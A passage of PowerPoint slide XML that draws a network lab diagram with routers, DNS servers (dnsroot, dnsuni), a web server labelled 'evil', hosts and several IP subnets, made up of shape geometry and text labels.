                    <a:gd name="T0" fmla="*/ 393 w 393"/>
                    <a:gd name="T1" fmla="*/ 28 h 132"/>
                    <a:gd name="T2" fmla="*/ 305 w 393"/>
                    <a:gd name="T3" fmla="*/ 0 h 132"/>
                    <a:gd name="T4" fmla="*/ 102 w 393"/>
                    <a:gd name="T5" fmla="*/ 83 h 132"/>
                    <a:gd name="T6" fmla="*/ 0 w 393"/>
                    <a:gd name="T7" fmla="*/ 55 h 132"/>
                    <a:gd name="T8" fmla="*/ 51 w 393"/>
                    <a:gd name="T9" fmla="*/ 132 h 132"/>
                    <a:gd name="T10" fmla="*/ 305 w 393"/>
                    <a:gd name="T11" fmla="*/ 132 h 132"/>
                    <a:gd name="T12" fmla="*/ 196 w 393"/>
                    <a:gd name="T13" fmla="*/ 104 h 132"/>
                    <a:gd name="T14" fmla="*/ 393 w 393"/>
                    <a:gd name="T15" fmla="*/ 28 h 1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32">
                      <a:moveTo>
                        <a:pt x="393" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="305" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="102" y="83"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="55"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="51" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="305" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393"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70" name="Freeform 236">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81811A58-DFB8-72B8-FFA9-96FA9BE8E8D1}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3050" y="2194"/>
                  <a:ext cx="392" cy="125"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 392"/>
                    <a:gd name="T1" fmla="*/ 28 h 125"/>
                    <a:gd name="T2" fmla="*/ 87 w 392"/>
                    <a:gd name="T3" fmla="*/ 0 h 125"/>
                    <a:gd name="T4" fmla="*/ 298 w 392"/>
                    <a:gd name="T5" fmla="*/ 77 h 125"/>
                    <a:gd name="T6" fmla="*/ 392 w 392"/>
                    <a:gd name="T7" fmla="*/ 56 h 125"/>
                    <a:gd name="T8" fmla="*/ 341 w 392"/>
                    <a:gd name="T9" fmla="*/ 125 h 125"/>
                    <a:gd name="T10" fmla="*/ 94 w 392"/>
                    <a:gd name="T11" fmla="*/ 125 h 125"/>
                    <a:gd name="T12" fmla="*/ 196 w 392"/>
                    <a:gd name="T13" fmla="*/ 104 h 125"/>
                    <a:gd name="T14" fmla="*/ 0 w 392"/>
                    <a:gd name="T15" fmla="*/ 28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2" h="125">
                      <a:moveTo>
                        <a:pt x="0" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="87" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="298" y="77"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="392" y="56"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="341" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0"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71" name="Freeform 238">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8062CE0-B2AF-02CF-011B-549AD740C575}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3442" y="2361"/>
                  <a:ext cx="393" cy="124"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 393 w 393"/>
                    <a:gd name="T1" fmla="*/ 97 h 124"/>
                    <a:gd name="T2" fmla="*/ 306 w 393"/>
                    <a:gd name="T3" fmla="*/ 124 h 124"/>
                    <a:gd name="T4" fmla="*/ 102 w 393"/>
                    <a:gd name="T5" fmla="*/ 41 h 124"/>
                    <a:gd name="T6" fmla="*/ 0 w 393"/>
                    <a:gd name="T7" fmla="*/ 69 h 124"/>
                    <a:gd name="T8" fmla="*/ 51 w 393"/>
                    <a:gd name="T9" fmla="*/ 0 h 124"/>
                    <a:gd name="T10" fmla="*/ 306 w 393"/>
                    <a:gd name="T11" fmla="*/ 0 h 124"/>
                    <a:gd name="T12" fmla="*/ 197 w 393"/>
                    <a:gd name="T13" fmla="*/ 21 h 124"/>
                    <a:gd name="T14" fmla="*/ 393 w 393"/>
                    <a:gd name="T15" fmla="*/ 97 h 1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4">
                      <a:moveTo>
                        <a:pt x="393" y="97"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="306" y="124"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="102" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="51" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="306" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="197" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393"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grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9265" name="WordArt 249">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0984BF71-B0D3-F781-886C-B3867FB49120}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2881" y="428"/>
              <a:ext cx="346" cy="103"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textCanDown">
                <a:avLst>
                  <a:gd name="adj" fmla="val 33333"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="it-IT" sz="1400" kern="10" dirty="0">
                  <a:ln w="9525">
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:round/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>r2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9272" name="Connettore diritto 9271">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59A9D3AE-7140-A451-4106-B8B42FA2B2B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2670433" y="3667061"/>
            <a:ext cx="248187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4" name="Connettore diritto 9273">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A5D4F92-A968-699A-25C9-4BF5255A3286}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="41" idx="5"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2788398" y="4164547"/>
            <a:ext cx="2388820" cy="154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278" name="Gruppo 9277">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48CB75C9-614D-CEAC-A2E2-D30AC6EDF91B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2180000" y="3348604"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9279" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F75A099D-2BC9-C8E8-0FBF-63B938B7D930}"/>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9280" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6692EA87-37D9-731F-E83B-52E1203C43FD}"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="9281" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E1147E9-4BA4-7673-A2FC-D33A12CB7A23}"/>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DNS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9282" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBEF0A1B-2162-9E0F-B45A-AB9175593652}"/>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dnsroot</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9283" name="Gruppo 9282">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D53888D-610B-D0FC-A6C6-63AF074D1F8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6310508" y="1227608"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9284" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48D1A311-C174-29C9-70D7-F59D6C38787F}"/>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9285" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90780D16-E0F8-D100-C9EE-CF1634BE26BF}"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="9286" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60BD3C16-3ED8-89AF-B863-D5BC672839B1}"/>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DNS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9287" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F72639E-7EC5-3AFB-E88F-8459761D1A41}"/>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dnsuni</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9288" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A5A06F5-1354-A58D-80E9-022972C7521E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3087815" y="3547893"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9289" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D2B28CD-5D09-0C08-FB54-F8F22E4A89E2}"/>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90" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62E6572B-819E-6BED-FB83-7425C0D98A88}"/>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5</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9291" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BD65A59-0637-4979-FD63-0C4A6A86D1A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3109411" y="4016212"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9292" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB394001-39C3-5866-8B39-46A3C066AF91}"/>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93" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE025422-A489-5646-703A-346205F28C40}"/>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
        <p:nvSpPr>
          <p:cNvPr id="9295" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{897F8494-8251-191B-38B9-5B68A97C1F7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5076643" y="3780075"/>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C</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9296" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4164336E-18B8-39C0-582D-7EAFC356D8AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3712201" y="3761897"/>
            <a:ext cx="106631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10.0.3.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9300" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08B0BBE6-20C7-03FB-6220-FB72F1F299AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1245708" y="2923524"/>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E</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9302" name="Group 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A873489-0260-1AE4-3BC9-D99DDE04BAE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4936638" y="5924428"/>
            <a:ext cx="576790" cy="613456"/>
            <a:chOff x="1429" y="1064"/>
            <a:chExt cx="818" cy="870"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9303" name="Picture 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3758769B-07F8-BCEE-82A0-8B0BACD0118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04" name="Text Box 106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8E708F0-8BE9-4236-A510-A5FE3B9A8785}"/>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pc4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9309" name="Gruppo 9308">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0C759F6-C537-A674-EC3D-55C2A0A4F5B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1862910" y="1768735"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9310" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38B75E40-CCBF-1016-827A-F5841A820650}"/>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evil</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9311" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC776186-EDC3-0A7F-28C0-2331312AC330}"/>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9312" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1E2DC07-B970-2162-1700-47ABCC2308F4}"/>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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9313" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CD1CDE4-3EE6-7772-FFD1-34BFFD11EA7F}"/>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WEB</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9314" name="Connettore diritto 9313">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{635C0645-1AE9-FC45-025B-EB317DF04528}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9310" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2316509" y="2363536"/>
            <a:ext cx="9207" cy="6703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19" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EE7B56F-4137-A863-9332-F68533A045EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2155594" y="2539339"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9320" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09530862-265D-9DD4-B973-C5F44279674E}"/>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321" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACCE90D8-399A-14EA-051A-FBC3064C8D08}"/>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50</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9325" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF5C65A4-DA7E-2A5A-A58E-9F0BEA333FC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="782820" y="3413145"/>
            <a:ext cx="114646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210.0.3.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9329" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6824D26-87E9-E0DC-B558-93DD87568A17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3573491" y="2906075"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9330" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A860F55-5426-6ECA-6C4B-F5DCB7428625}"/>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eth2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9331" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD51212F-6FE4-84F1-6B7C-9E21EE16BC25}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Line 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{582CAF39-358F-5FA1-A51E-04E86FC55B25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3229794" y="5118807"/>
            <a:ext cx="0" cy="118746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28" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD186456-83B2-59BD-870E-0BB58665EADC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3119449" y="6295882"/>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D</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{937974DE-D2C9-0538-6123-2C29B4BC389A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="864519" y="6199275"/>
            <a:ext cx="1467069"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192.168.100.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="58" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72C15B60-548F-E4BE-DEE7-242142F10709}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2241803" y="5652867"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
